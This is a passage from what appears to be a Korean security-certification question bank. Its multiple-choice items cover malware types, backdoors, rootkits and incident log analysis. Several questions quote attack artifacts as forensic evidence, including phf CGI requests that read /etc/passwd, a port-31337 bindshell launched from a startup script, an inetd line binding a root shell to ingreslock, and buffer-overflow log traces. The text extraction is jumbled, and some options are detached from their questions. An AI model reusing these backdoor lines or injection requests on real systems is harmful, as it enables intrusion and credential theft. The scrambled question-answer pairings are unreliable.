때문에 보안의 맹점이 될 수 있 는 것은 다음 중 어느 것인가? 1 논리폭탄(Logic Bomb) 2 트랩도어(Trap Door) 3 데이터 누설(Data Leakage) 4 트로이 목마(Trojan Horse) 101. 다음 중 시스템에 비인가 접근을 할 수 있 도록 하는 악성 코드는? 1 논리 폭탄(Logic Bomb) 2 바이러스(Virus) 3 백도어(Back Door) 4 웜(Worm) 383
384 102. 프로그램 내에 은폐된 루틴을 삽입하여 불 법 행위의 대상이 되는 컴퓨터에서 루틴 에 삽입된 명령을 실행하게 되는 것은? 1 트랩도어 2 트로이 목마 3 컴퓨터 바이러스 4 웜 103. 바이러스 유형 중 가장 간단한 형태로 원래 프로그램의 크기 변동 없이 프로그램의 앞에 붙 어, 프로그램이 실행되면 먼저 실행되어 자원을 파괴하는 바이러스를 무엇이라 하는가? 1 메모리 상주 바이러스 2 Non-Overwrite 바이러스 3 Overwrite 바이러스 4 Calling 바이러스 104. 다음 중 바이러스 발전단계와 바이러스 형 태가 잘못 짝지어진 것은 어느 것인가? 1 제 1세대 - 원시형 바이러스(Primitive Virus) 2 제 2세대 - 암호형 바이러스(Encryption Virus) 3 제 4세대 - 다형적, 자체변형형 바이러스 (Armour Virus) 4 제 5세대 - 은폐형 바이러스(Stealth Virus) 106. 컴퓨터 바이러스로부터 시스템을 보호하기 위한 방법으로 적당하지 않은 것은? 1 인터넷이나 네트워크에서의 다운로드는 업무용 PC에서 이루어져야 한다. 2 상용 프로그램은 정품을 구입하여 사용하여야 한다. 3 바이러스 진단 프로그램을 정기적으로 업데이트해 줘야 한다. 4 지속적인 교육을 실시하여 바이러스 감염에 대한 경각심을 고취해야 한다 애플릿(Applet)의 취약성은 침해사고 발생 시 매우 까다로운 문제를 야기하다. 다음 중 가 장 큰 파괴 위험을 유발하는 것은? 1 접근한 시스템 자체에만 바이러스를 심는 프로그램 2 접근한 시스템 자체에만 키보드 조작, 즉 패스워드를 기록하는 애플릿 3 접근한 시스템 자체에만 클라이언트 하드 드라이브 상의 파일을 파괴하는 코드 4 클라이언트로부터의 연결을 통해 네트워크 상의 시스템에 해를 입히는 애플릿 108. 다음 중 회선가로채기(line-grabbing) 기법에 의해 유발될 수 있는 노출은 무엇인가? 105. 바이러스 중 백신 프로그램을 공격 목표로 삼아 백신 프로그래머가 백신을 제작하는 과정을 어렵게 만드는 방법을 사용하는 것을 모두 고르 면? 1 은폐형 바이러스 2 갑옷형 바이러스 3 매크로 바이러스 4 암호형 바이러스 1 승인되지 않은 데이터 접근 2 과도한 CPU 사이클 사용 3 lockout of terminal polling 4 멀티플랙서 통제 장애(Multiplexer Control Disfunction) 109. 동일한 메시지를 인터넷상의 서로 상관없는 여러 뉴스그룹에 올리는 행위를 무엇이라 하는 가? 1 폭탄메일(Mail bombing) 2 스푸핑(Spoofing) 3 훔쳐보기(Shoulder surfing) 4 스패밍(Spamming) 384
385 110. 해커의 침입흔적 삭제 및 재침입을 위해 사 용되는 백도어를 만들기 위한 도구들의 모음을 무엇이라 하는가? 1 Rootkit 2 NIMDA 3 Kerberos 4 IDS 111. 다음 해킹이 이루어지는 절차 중 괄호 안에 들어갈 말로 가장 적당한 것은 무엇인가? 정보 시스템에 잠입 - ( ) - 백도어 설치 - 침 입 흔적 삭제 1 시스템 패스워드 추정 2 관리자 시스템 추적 3 핵심 시스템 탐지 4 root 권한 획득 115. 침해사고 시 크래커가 관리자 권한 획득 후 재침입시도를 위해 백도어를 숨겨 놓은 경우가 대부분이다. 이 백도어를 탐지, 발견하는 것이 침 해사고가 발생한 시스템에 가장 중요한 분석이 다. 다음 백도어에 대한 설명 중 옳지 않은 것 은? 1 Kernel 백도어: Kernel 자체에 백도어를 숨겨 놓은 방법으로 발견이 가장 어렵고 조치 역시 어렵다. 2 프로세스 은닉 백도어: 바이러스가 bootblock 에 자신을 숨기고, 프로세스가 바뀌어졌는지 를 감시 기능을 방해한다. 3 TCP 쉘 백도어: 외부 접근 시 관리자 권한의 쉘 접근 권한을 준다. 4 네트워크 트래픽 백도어: 네트워크 트래픽 까지 숨기는 기능을 가지고 자신을 숨기는 기능을 가지고 있다 시스템 침해사고 후 크래커가 설치해 또다 시 접근할 수 있도록 설정한 것을 백도어라고 한 다. 원격 접근 백도어가 아닌 것은? 1 Trojaned login 2 Trojaned inetd 3 Trojaned rshd 4 Trojaned du 116. 매크로 바이러스가 할 수 있는 것을 모두 선택하시오? 1 하드 드라이브의 포맷 2 자신이 원하는 외부 명령을 수행 3 비밀번호를 찾아내고 이메일을 통하여 외부로 전송 4 다른 프로그램으로의 전파 113. 다음 중 인증되지 않는 상태에서 논리적 접 근이 이루어질 수 있는 취약성을 가진 것은 무엇 인가? 1 논리 폭탄(Logic Bomb) 2 비동기적 공격(Asynchronous Attack) 3 데이터 누설(Data Leakage) 4 트랩 도어(Trap Door) 114. Reverse Backdoor가 이용하는 보안 기반 모델의 취약성으로 다음 중 옳은 것은? 1 침입차단시스템의 외부 관리의 취약성 2 OS 기반의 취약성 3 침입 차단시스템의 자체 시스템 취약성 4 Outgoing Packet Filtering 부재 117. 아래와 같은 것들이 소개된 대표적인 백도 어 패키지는? z2 - utmp,wtmp,lostlog로부터 특정 엔트리를 제거한다. Es - sum4 기반 커널들의 이더넷 스니퍼 FIx - 체크썸 값을 가장하는 도구 Sl - 매직 패스워드를 통하여 관리자로 로그인하는 도구 1 Kernel backdoor 2 File System backdoor 3 Rootkit 4 Bootblock backdoor 385
386 118. 백도어는 코드 수정 없이 설치할 경우 디폴 트로 정해진 포트를 사용하여 데몬역할을 한다. 다음 중 디폴트 포트번호와 해당하는 백도어를 짝지은 것 중 틀린 것은? 1 Port RPC Backdoor 2 Port RingZero 3 Port BoBo 4 Port Back Orifice 121.시스템이 이상하여 아래와 같은 과정을 통하 여 확인하였다. 아래의 결과를설명한 것 중 옳지 못한 것은? # vi /etc/rc.d/rc/local... /bin/bindshell # ps -ef grep bindshell root :12 tty1 00:00:00./bindshell 119. 네트워크 모니터링 도구에서 의심스러운 사 용자의 행동을 감시한 결과, 사용자가다음과 같 은 행위를 하는 것을 발견하였다. 대상 시스템 a.b.c.d 에 설치되어 있는백도어는 무엇인가? [attacker]# telnet a.b.c.d Trying a.b.c.d... Connected to a.b.c.d. Escape character is '^]'. id; uid=0(root) gid=0(root) groups=0(root), 1(bin), 2(daemon), 3(sys), 4(adm), 6 (disk), :command not found 1 Login 백도어 2 Bindshell 백도어 3 Cronjob 백도어 4 패스워드 백도어 120. 보안을 위협하는 요소 중에 한가지로 컴퓨 터 바이러스로 대표되는 악성코드가 있다. 다음 중 이런 악성코드에 대하여 잘못된 설명은? 1 바이러스, 웜, 트로이목마 프로그램 등이 있다 2 윈도우 보안패치를 통해 위험성을 어느 정도 감소시킬 수 있다 3 바이러스를 제거하기 위해 설치한 백신 프로그램은 항상 최신버전으로 유지해야한다 4 백신프로그램을 이용하면 항상 바이러스를 확실히 치료할 수 있다 #lsof -p 651 COMMAND PID USER FD TYPE DEVICE SIZE NODENAME... bindshell 651 root 3u inet 880 TCP*:31337(LISTEN) # telnet Trying Escape to / Escape character is '^'. id: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6 (disk),10(wheel) :command not found 1 시작 스크립트 파일에 백도어를 띄워주는 명령라인을 삽입하였다 포트로 접속하면 루트(root)권한을 얻을 수 있는 백도어가 삽이 되어있다. 3 위의 내용으로는 백도어가 삽입되었는지 정확히 알 수 없으며 trust(strace : Linux)를 실행하여 확인이 필요하다. 4 rootkit과 함께 설치되면 더욱 찾기 힘들다. 386
387 122. 아래는 현재까지의 네트워크 백도어 (Backdoor)에 대한 설명이다 옳지 못한 것은? 1 TCP 쉘 백도어 - netstat 명령으로 쉽게 찾아 낼 수 있으나 SMTP 같은 흔히 사용되는 포트 를 이용하면 구별하기 힘들다. 2 UDP 쉘 백도어 - netstat 명령으로 공격자가 접속하는 것이 잘 나타나지 않으므로 nmap 등의 포트 스캐너를 이용하는 것이 바람직하 다. 3 ARP 쉘 백도어 - 특정 포트(Port)를 사용하지 않고 ARP를 이용하므로 접속 여부를 알기 힘 들고 침입차단시스템 우회 공격에 주로 사용 된다. 4 ICMP 쉘 백도어 - covert channel이라고도 하며 단순히 ping이 오가는 것으로만 판단 하게 된다 매크로 바이러스의 특징이 아닌 것은? 125. 다음 침입기법 또는 도구의 공통적인 특 징은 무엇인가? Backdoor, Reverse Telnet, Bounce Attack 1 DoS 공격의 일종이다 2 시스템의 정보를 탐지하기 위한 기법이다 3 네트워크 스니핑 기법의 일종이다 4 침입차단시스템을 우회하기 위한 기법이다 126. 다음은 일반적인 해킹 절차를 나열한 것이 다. 다음 빈칸에 들어갈 내용을 짝지은 것으로 가장 적당한 것은? 정보수집-불법적인 접근 - ( ) - 스니퍼 설치 - 백도어, 트로이잔 등 설치 - 자료 변조, 삭 제 등 불법 행위 - ( ) 1 루트권한 획득-로그삭제 2 IRC서버운영-루트권한 획득 3 타시스템 공격-루트권한 획득 4 로그삭제-타시스템 공격 1 프로그래밍 언어를 몰라도 손쉽게 만들 수 있 다. 2 문서나 데이터를 통해 전파되기보다는 실행 파일을 통하여 전파된다. 3 같은 매크로 언어를 공유한다면 플랫폼에 상관없이 피해를 입힐 수 있다. 4 일반적으로 사용자가 감염된 문서를 열거나 닫을 때 전파된다 매크로 바이러스에 대한 대처 방안으로 옳 지 않은 것은? 1 문서에서 매크로 실행 금지 설정 2 오피스 보안 수준을 높음으로 설정 3 MS의 Outlook Express를 사용 4 백신프로그램을 이용한 문서 자동 검사 127. 사용자의 PC가 VBScript 웜에 감염되었을 때, 다음 중 가능한 감염경로가 아닌 것은? 1 아웃룩 메일프로그램으로 메일의 첨부파일을 열었을 때 2 인터넷 서핑 중 Click accept ActiveX' 메시지가 팝업 되어 Yes 버튼을 눌렀을 때 3 채팅 도중 상대에게 전송받은 파일을 실행 시킬 때 4 네트워크에 읽기 쓰기 권한의 폴더를 접근 패스워드 설정하여 공유시켰을 때 387
388 128. 보안 사고를 방지하기 위한 통제에는 예방 통제와 탐지 통제, 교정 통제가 있다. 트로이 목 마 보안대책 중 교정 통제에 해당하는 것은 무엇 인가? 131. 루트킷, 트로이 목마, 백도어 등은 피해시스 템의 시스템 프로그램을 변조한다. 다음 중 시스 템 프로그램이 변조되었는지 확인하는 방법으로 올바르지 않은 것은? 1 롬 바이오스 패스워드 등을 사용한 PC의 물리적 보안 강화 2 출처가 불분명한 메일 첨부파일의 실행 주의 3 주기적인 시스템 백업 강화 4 통신망, 인터넷 망을 통한 파일 다운로드 주의 129. Nimda 웜에 대한 설명으로 옳지 않은 것 은? 1 system.ini 파일을 Shell=explorer.exe load.exe -dntrunold로 변형한다. 2 감염된 클라이언트는 Windows address Book 에 있는 모든 주소로 Nimda 웜을 포함한 을 전송한다. 3 Code Red II와 sadmin/iis 웜에 의해서 만들어진 백도어를 스캐닝하여 공격하거나 IIS Directory Traversal 취약성을 통해서 전파 된다. 4 감염된 메일의 제목 란의 문자길이가 가변적 이고 첨부된 바이너리 파일도 매번 변하므로 sendmail의 설정만으로 필터링 하기 힘들다 트로이 목마와 같은 백도어의 방어대책 중 효과적이지 않은 것은? 1 주기적 무결성 점검 2 CDROM 으로부터 부팅 3 침임 탐지 프로그램 운영 4 시스템 전체 총 파일 개수를 파악 1 패키지 버전 검사 2 시스템 프로그램의 파일 크기, 타임스탬프 확인 3 시스템 프로그램이 호출하는 시스템 콜 추적 4 파일 무결성 검사 132. 다음 중 Blaster.Worm에 대한 설명으로 올 바르지 않은 것은? 1 바이러스를 전파하기 위하여 메일주소를 추출 하여 바이러스 메일을 발송한다. 2 이 바이러스는 MS RPC 취약성을 통해 전파 되며, 웜에 감염 시 외부에서도 접속 가능한 백도어의 설치 및 재감염을 위한 네트워크 스캔으로 인해 서비스 거부공격이 발생한다. 3 웜에 감염되면 TCP 4444 port를 사용하는 백도어가 오픈된다. 4 바이러스의 전파를 위해 임의의 IP 주소를 생성한 후, RPC 취약성의 공격 트래픽을 발생 시킨다 다음에서 설명하는 프로그램을 무엇이라 하 는가? 리얼플레이어와 같은 무료 공개 소프트웨어를 내려 받아 설치할 때 자동적으로 함께 설치 되면서 개인의 중요한 정보를 상대방에게 알 려주는 프로그램을 말한다. 소프트웨어 회사 들이 정품 프로그램을 무료로 배포하기 위한 재원 마련용 마케팅 수단으로 설치하는 경우 가 많다. 사용자의 동의를 얻은 후 설치되는 이런 형태의 프로그램은 컴퓨터 이용자의 이 름이나 IP 주소, 클릭한 배너 광고 등 프로그 램 이용자에 대한 개인정보를 미리 특정서버 로 보냄으로써 외부에서 인터넷을 통해 이용 자의 개인정보를 확인할 수 있지만 최근 이를 악용한 사용자 정보 유출의 위협이 증가되고 있다. 1 Groupware 2 Spyware 3 shareware 4 Backdoor 388
389 134. 최근 제작되고 있는 거의 모든 악성프로그 램은 바이러스 파일을 자동으로 실행하도록 설정 하고 있어 한번 감염된 시스템에서는 사용자도 모르는 사이에 바이러스와 웜 들이 계속적으로 자동 실행된다. 다음 중 이런 불법적인 자동 실 행 프로그램을 검사 하기 위해 점검해야 하는 파 일과 상관이 없는 것은? 1 win.ini, system.ini 2 C:\Documents and Settings\Administrator\LocalSettings\My Documents\Security 3 C:\Documents and Settings\Administrator \시작 메뉴\프로그램\시작프로그램 4 HKEY_LOCAL_MACHINE\Software\Microsoft \Windows\CurrentVersion\RunServices 135. 일부 악성 바이러스의 경우 백신프로그램이 나 수동으로 치료를 할 때 운영체제에 의해 접근 이 거부되는 경우가 있다. 이런 바이러스를 치료 하는 방법으로 가장 적절한 것은? 136. 다음에 나열된 악성 프로그램들이 가지고 있는 공통적인 특징은 무엇인가? Win-Trojan/Ecokys, Win-Trojan/Bugbear, Win-Trojan/Kuang, IK97 1 Keylogger 프로그램 2 Worm 바이러스 3 RPC 취약성을 통해 전파 4 일반적인 백신으로 치료 불가능 137. 다음의 설명 중에서 틀린 것은? 1 자기 복제 - 바이러스를 새로운 호스트로 전달되는 기능 2 자기 은폐 - 시스템 내에서 자신의 코드를 숨기는 기능 3 페이로드 - 바이러스가 가지고 있는 행동 4 트리거 - 자기 은폐를 작동시키는 기능 138. 다음에서 성격이 다른 하나는? 1 부팅 가능한 깨끗한 디스켓으로 시스템을 부팅한 후, MS-DOS 상태에서 바이러스를 제거한다. 2 Ctrl+Alt+Delete를 눌러서 작업 관리자를 시작한 다음 응용 프로그램 탭을 클릭하고 백신프로그램에서 트로이목마로 검사된 파일명을 찾아 작업 끝내기 를 클릭하면 종료되므로, 해당 파일을 삭제해 버리면 된다. 3 백신 프로그램을 플로피 디스켓에 포함 시킨 다음 플로피 디스크 상에서 치료를 시도한다. 4 레지스트리 등록 정보에서 바이러스 정보를 찾은 다음, 값을 삭제한다. 1 부트 바이러스 2 파일 바이러스 3 트로이 목마 4 윈도우 바이러스 139. 다음의 설명을 나타내는 것은? 바이러스인 것처럼 보여서 사람들을 놀라게 하지만 실제로는 해를 입히는 프로그램 은 아니지만, 실 환경에서 업무에 많은 영향 을 미칠 수 있다. 1매크로 바이러스 2악성 코드 3 hoax 4 파일 바이러스 389
390 140. 다음 트로이 목마에 대한 설명 중에서 바르 지 않는 것은? 1 트로이 목마는 외관상 해롭지 않지만 프로그램/데이터에 악성코드를 포함하고 있는 프로그램이다. 2 트로이 목마는 감염시키는 것 보다 특별한 작업을 수행하는데 목적이 있다. 3 트로이 목마는 자기 폭파 기능을 가지고 있으며, 임의의 작업을 수행하기 위해 자신을 파괴시킨다. 4 트로이 목마는 바이러스를 나타내는 말이다 최근 접속한 hacker라는 사용자가 침해사고 의 의심이 간다. 이 사용자의 로그인했 던 기록 을 찾아내고자 하는데 필요한 적절한 명령어는? 1 w 2 who 3 sort 4 last 142. 최근 발생한 침해사고에 대해 hacker라는 계정이 공격자로 의심된다. 다음 로그 중 사용자 가 실행한 모든 명령을 볼 수 있는 로그는 무엇 인가? 144. 침해 시스템의 분석 시 각종 로그기록의 분 석은 침해사고 재발 방지를 위한 첩경이 다. 다 음 중 솔라리스 시스템에서 로그 파일이 아닌 것 은? 1 sulog /var/adm/sulog 2 root history $HOME/.sh_history 3 시스템 로그 /var/messages 4 apache log /var/adm/access_log 145. 다음은 텍스트 로그로 저장되는 sulog의 분 석 화면이다. 다음 중 침해 의심이 가는 계정은? SU 11/07 13:45 + pts/2 admin-root SU 11/07 13:48 + pts/0 admin-oracle SU 11/07 13:56 + pts/0 admin-oracle SU 11/07 14:05 - pts/0 nms98-root SU 11/09 11:45 - pts/11 nms98-root SU 11/09 11:46 - pts/11 nms98-root SU 11/09 11:46 - pts/11 nms98-root 1 admin 2 root 3 nms98 4 oracle 1 sulog 2 messages 3 syslog 4 pacct 143. 침해사고 시 로그를 분석하여 비인가자의 접근 내역과 수행한 작업 등을 확인할 수 있다. 침해사고 시 분석해야 될 로그파일을 모두 고르 면? 1 router log 2 firewall log 3 IDS log 4 system log 146. 침해사고 시 로그를 분석하여 비인가자의 접근 내역과 수행한 작업 등 여러 가지 상 황에 대한 파악을 할 수 있다. 다음 로그 중 바이너리 로그가 아닌 특성을 이용하 여, 관리자 권한을 획득한 공격자가 일반 에디터로 쉽게 수정할 수 있는 로그는? 1 sulog 2 wtmp 3 utmp 4 pacct 390
391 147. 웹 서비스 관련 로그와 CGI 취약성 스캔이 나 공격 시의 로그를 보여주고 있다. 이 와 같은 내용을 포함하는 로그파일은? xxx.xxx.xxx.xxx - - [16/Dec/2001:10:38: ] "GET /cgi-bin/phf?qname=root%0acat%20/etc/pas swd HTTP/1.1" xxx.xxx.xxx.xxx - - [16/Dec/2001:20:11: ] "GET /cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/pas swd HTTP/1.0" xxx.xxx.xxx.xxx - - [16/Dec/2001:15:37: ] "GET /cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/pas swd HTTP/1.0" xxx.xxx.xxx.xxx - - [16/Dec/2001:09:56: ] "GET /cgi 1 access_log 2 sulog 3 messages 4 pacct 148. 침해사고가 발생한 후 messages 로그에 아 래와 같은 공격 로그가 남았다. 추정할 수 있는 공격 방법은? Apr 12 21:41:32 blade rpc.ttdbserverd[1706]:_tt_file_system::findbest MountPoint -- max_match_entry is null, aborting... Apr 12 21:41:32 blade inetd[127]: /usr/dt/bin/rpc.ttdbserverd: Child StatusChanged - core dumped Apr 12 21:41:33 blade rpc.ttdbserverd[1707]: iserase(): 78 May 28 10:55:13 server inetd[151]: /usr/dt/bin/rpc.ttdbserverd: Segmentation Fault - core dumped 1 in.lpd(bsd-gw) 취약성을 이용한 버퍼오버플로 공격이 있었다. 2 관리자 권한으로 dial-out RSA 서비스의 취약성 공격이 있었다. 3 amd 취약성을 이용한 버퍼오버플로 공격이 있었다. 4 rpc.ttdbserverd를 이용한 버퍼오버플로 공격이 있었다 관리자 김 씨는 자신이 운영하는 00 서버의 로그를 점검하던 중 아래와 같은 공격 로그가 남 아 있는 것을 발견하였다. 다음 중 옳은 것은? Aug 26 04:08:49 omega named[158]: unapproved AXFR from [ ] for in-addr.arpa 1 in.lpd (bsd-gw)취약성을 이용한 버퍼 오버 플로 공격이 있었다. 2 관리자권한으로 dial-out RSA 서비스의 취약성 공격이 있었다. 3 amd 취약성을 버퍼오버플로 공격이 있었다. 4 다량의 DNS query를 사용한 공격이 있었다 침해사고 발생한 후 messages 로그에 아래 와 같은 공격 로그가 남았다. 아래의 공격 방법 에 대한 설명 중 옳은 것은? Jun 21 07:19:44 testmachine rpc.statd[353]: gethostbyname error for ^X 阪 X 阪 Y 阪 Y 阪 Z 阪 Z 阪 [ 阪 [ 阪 8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n %137x%n%10x%n%192x% n\220\220\220\220\220\220\220\220\ 220\220\220\220\220\220\220\220\220 \220\220\2 1 in.lpd (bsd-gw)를 이용한 버퍼오버플로 공격 이 있었다. 2 root로 dial-out RSA 서비스의 취약성 공격이 있었다. 3 amd를 이용한 버퍼오버플로 공격이 있었다. 4 rpc.statd를 이용한 버퍼오버플로 공격이 있었다 침해사고 시 로그를 분석하여 비인가자의 접근 내역과 수행한 작업 등 여러 가지 상황에 대한 파악을 할 수 있다. 다음 로그 파일들 중에 해커에 의해 악용될 수 있는 위험이 가장 높은 시스템 내부의 로그 파일은 어느 것인가? 1 messages 2 access_log 3 agent Log 4 reference Log 391
392 152. Windows 2000 IIS(Internet Information Server) 5.0으로 운영되는 시스템에서 접속하는 방문자의 웹 브라우저의 타입, O/S, 화면 해상도 등에 대한 정보를 제공하는 로그파일은 다음 중 어느 것인가? 1 system log 2 agent log 3 access_log 4 reference log 153. 침해사고시 로그를 분석하여 비인가자의 접 근내역과 수행한 작업등 여러 가지 상황 에 대한 파악을 할 수 있다. 다음 로그 중 커널 에러, 리 부팅 메시지에 대한 정보를 가지는 로그는? 1 utmp 2 wtmp 3 messages 4 access_log 155. 다음은 텍스트 로그로 저장되는 sulog의 분 석 화면이다. hack이라는 계정을 합법적 으로 부 여받은 내/외부 직원이 없는데도 불구하고, DB 접근을 시도하는 hack 계정을 완전히 제한시키는 가장 적절한 방법은? SU 11/07 13:45 + pts/2 chanc-root SU 11/07 13:48 + pts/0 hack-oracle SU 11/07 13:56 + pts/0 hack-oracle SU 11/07 14:05 + pts/0 root-nms98 1 텔넷 서비스를 제한한다. 2 인증(Authentication)을 강화한다. 3 /etc/passwd, /etc/shadow에서 hack 계정을 삭제한다. 4 hack 계정의 홈디렉터리를 삭제한다 침해 사고 시스템 로그에 아래와 같은 공격 로그가 남았다. 아래의 공격방법에 대한 설명으 로 옳은 것은? Jun 21 16:25:59 testmachine ftpd[10327]: ANONYMOUS FTP LOGIN FROM (\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220 \220\220 \2 1 in.lpd (bsd-gw)를 이용한 버퍼오버플로 공격 이 있었다. 2 wu-ftpd를 이용한 버퍼오버플로 공격?있었다. 3 amd를 이용한 버퍼오버플로 공격이 있었다. 4 rpc.statd를 이용한 버퍼오버플로 공격이 있었다 다음은 웹 서비스 시에 텍스트 형태로 저장 되는 access_log의 분석화면이다. 다음 설명 중 침해사고로 의심이 되는 부분을 적절히 설명한 것은? [26/Oct/2001:09:00: ] "GET /chumgo2/member/board2/list.php?board=1 4h HTTP/1.1" [26/Oct/2001:09:00: ] "GET /chumgo2/member/memo/current_user.php HTTP/1.1" [26/Oct/2001:09:00: ] "GET /chumgo2/image/mainback2.gif HTTP/1.1" [26/Oct/2001:09:00: ] "GET /etc/passwd /etc/passwd _check.php?mode=check HTTP/1.1" IP 게시판(board) 의 취약성을 이용하여 접근이 의심된다. 2 IP 최근 접근한 계정을 해킹하여 침해사고가 의심된다. 3 IP php 취약성을 통한 접근이 의심된다. 4 IP 패스워드 공격을 통한 접근이 의심된다. 392
393 157. 아래는 리눅스 시스템에서 사용되는 메시지 로그(Messages log)를 보여주고 있는 데, 이에 대한 설명으로 옳지 않은 것은? Jul 1 12:02:50 linux syslogd : restart Jul 1 12:02:52 linux kernel : klogd 1.3-3, log secure = /proc/kmsg started. Jul 1 12:02:52 linux kernel : Loaded 4122 symbols from /boot/system.map Jul 1 12:10:38 linux syslog : LOGIN ON tty1 BY kisa Jul 1 12:11:36 linux syslog : FAILED LOGIN 1 FROM FOR kisa, User not known to the underlying authentication module Jul 1 12:11:36 linux syslog : FAILED LOGIN 1 FROM FOR kisa, User not known to the underlying authentication module Jul 1 12:11:40 linux syslog : LOGIN ON ttyp0 BY kisa FROM 시스템과 커널 메시지는 두 가지 데몬 (syslogd, klogd)에 의해 처리된다. 2 /var/log/messages는 syslogd와 klogd로부터 출력되는 메시지를 저장한다. 3 로그부분 마지막에는 에러발생에 대한 원인, 서비스, 취해진 행동을 볼 수 있다. 4 표준 syslog와 kernel 메시지에 대해서만 저장을 하고 네트워크 서비스로부터의 메시지 는 저장하지 않는다. Apr 10 19:03:07 insecure in.rshd[4725]: connect from Apr 11 18:23:07 insecure in.telnetd[6528]: connect from Apr 11 18:23:13 insecure login:login ON 1 BY mokim FROM mokim Apr 11 19:21:11 insecure in.telnetd[6583]: connect from Apr 11 19:21:21 insecure login: LOGIN ON 1 BY mokim FROM mokim Apr 12 01:53:12 insecure login: ROOT LOGIN ON tty1 Apr 12 02:42:54 insecure in.ftpd[607]: connect from Apr 12 23:58:29 insecure in.telnetd[1095]: connect from Apr 12 23:58:35 insecure login: LOGIN ON 2 BY mokim FROM mokim Apr 13 00:15:30 insecure in.telnetd[1134]:connect from 같은 서브넷 상의 여러 IP에서 접근을 시도 했기 때문이다. 2 정상적인 사용자는 동일한 시간에 여러 서비스 요청을 동시에 할 수 없기 때문이다. 3 새벽시간에 집중된 접속이 있기 때문이다. 4 multiple 스캔만이 이런 로그 기록을 남기기 때문이다 시스템 관리자는 다음 로그 기록을 보고 multiple 스캔 공격이 있었음을 판단했다. 그 이 유로 가장 타당한 것은 무엇인가? Apr 10 02:45:38 insecure in.rshd[4722]: connect from Apr 10 02:45:38 insecure in.rlogind[4724]: connect from Apr 10 02:45:38 insecure in.ftpd[4726]: connect from Apr 10 02:45:38 insecure in.fingerd[4728]: connect from Apr 10 02:45:38 insecure in.telnetd[4725]: connect from
394 159. 아래의 로그를 설명하고 있는 것은? #cat /var/logsecure may 15 18:45:38 insecure in.rshd[4722]: connected from may 15 18:45:38 insecure in.rlogind[4722]: connected from may 15 18:45:38 insecure in.ftpd[4726]: connetd from may 15 18:45:38 insecure in.fingerd[4728]: connetd from may 15 18:45:38 insecure in.telnetd[4742]: connetd from may 15 18:45:38 insecure in.tftpd[4746]: connetd from may 16 11:24:10 insecure in.telnetd[6528]: connetd from may 16 11:24:15 insecure login: LOGIN ON 1BY kisa FROM kinsa may 16 12:24:18 insecure in.telnetd[6532]: connetd from may 16 12:24:23 insecure login: LOGIN ON 1BY sis FROM sis may 16 13:30:27 insecure login: ROOT LOGIN ON tty1 may 17 23:31:27 insecure in.ftpd[607]: connect from 213:213:111:111 may 17 23:33:37 insecure in.telnetd[1095]: connect from 211:245:111:111 1 특정한 공격을 발견할 수 없는 매우 정상적인 로그이다 의 주소로부터 스캔 공격을 받은 것으로 간주된다. 3 5월 16일 12시에 SIS로부터 버퍼 오버플로 공격을 받은 것으로 간주된다. 4 www 관련 공격을 받은 것으로 간주된다 아래의 로그 및 상황을 잘못 분석하고 있는 것은? # cat /var/adm/messages may 15 18:45:38 victim /usr/dt/bin/rpc.ttdbserverd[29906]: _Tt_ftle_system::findBestMountPonint --max_match_entry is null, aborting... may 15 18:45:39 victim inetd[147]: Segmentation Fault -core dumped may 15 18:45:50 victim /usr/dt/bin/rpc.ttdbserverd[8206]: iserase(): 78 may 15 18:46:08 victim inetd[147]: /usr/sbin/sadmind: Bus Error -core dumped may 15 18:46:18 victim last message repeated 1 time may 15 18:46:28 victim inetd[147]: /usr/sbin/sadmind: Segmentation Fault - core dumped may 15 18:46:30 victim inetd[147]: /usr/sbin/sadmind: Hangup may 15 18:50:15 victim login: change password failure: No account present for user may 15 18:52:23 victim last message repeated 2 times may 15 18:55:25 victim inetd[147]:/usr/dt/bin/rpc.ttdbserverd:killed may 15 18:55:25 victim inetd[147]:/usr/dt/bin/rpc.cmsd: Killed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~ # ls -alc /tmp/.x -rw-rw-rw- 1 root root 48 5월 15일 18:46 /tmp/.x # more /tmp/.x ingreslock stream tcp nowait root /bin/sh sh-i 1 5월 15일 18시 45분부터 rpc.ttdbserverd, sadmaind, rpc.cmsd에 대한 공격 흔적을 볼 수 있다. 2 /var/adm/messages의 로그만으로도 루트 (root)권한을 취득했는지 알 수 있다. 3 sadmind의 버퍼오버플로 취약성으로 공격당 한 것으로 판단된다. 4 공격이 이루어진 시간대에 /tmp/.x 파일이 생성되었고 ingreslock에 root shell이 바인딩 되어있는 것으로 보아 sadmind 공격이 성공 한 것으로 보인다. 394
395 161. 아래의 내용을 정확히 말하고 있지 않은 것 은? root]# netstat -a Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:mysql *:* LISTEN tcp 0 0 *:2 *:* LISTEN [root@ns1 xinetd.d]# telnet localhost 2 Trying Connected to localhost. Escape character is '^]'. SSH [root@ns1 root]# more /etc/passwd dark:x:0:0::/dev:/bin/bash SSH 일반적인 22번 포트 대신 2 포트를 이용 하여 백도어로 사용하는 것으로 의심된다. 2 dark uid=0,gid=0로 super user권한을 가진 불법적인 계정을 가지고 있는 것으로 보인다. 3 위의 내용으로는 아무것도 알 수 없다. 4 공격의 흔적을 분석하기 위해서는 log 파일 검사 및 바이너리 파일의 변경 확인 등을 하는 것이 좋다 아래는 nmap, sscan, saint등과 같은 포트 스캔 도구나 서버의 보안 취약성 점검 도구를 이 용한 공격에 의해 발생한 로그이다. 리눅스 시스 템에서 로그가 남는 장소? may 15 18:45:38 insecure in.rshd[4722]: connetd from may 15 18:45:38 insecure in.rlogind[4722]: connetd from may 15 18:45:38 insecure in.ftpd[4726]: connetd from may 15 18:45:38 insecure in.fingerd[4728]: connetd from may 15 18:45:38 insecure in.telnetd[4742]: connetd from may 15 18:45:38 insecure in.tftpd[4746]: connetd from may 16 11:24:10 insecure in.telnetd[6528]: connetd from may 16 11:24:15 insecure login: LOGIN ON 1BY kisa FROM kinsa may 16 12:24:18 insecure in.telnetd[6532]: connetd from may 16 12:24:23 insecure login: LOGIN ON 1BY sis FROM sis may 16 13:30:27 insecure login: ROOT LOGIN ON tty1 may 17 23:31:27 insecure in.ftpd[607]: connect from 213:213:111:111 may 17 23:33:37 insecure in.telnetd[1095]: connect from 211:245:111:111 1 /var/log/messages 2 /var/log/maillog 3 /var/log/secure 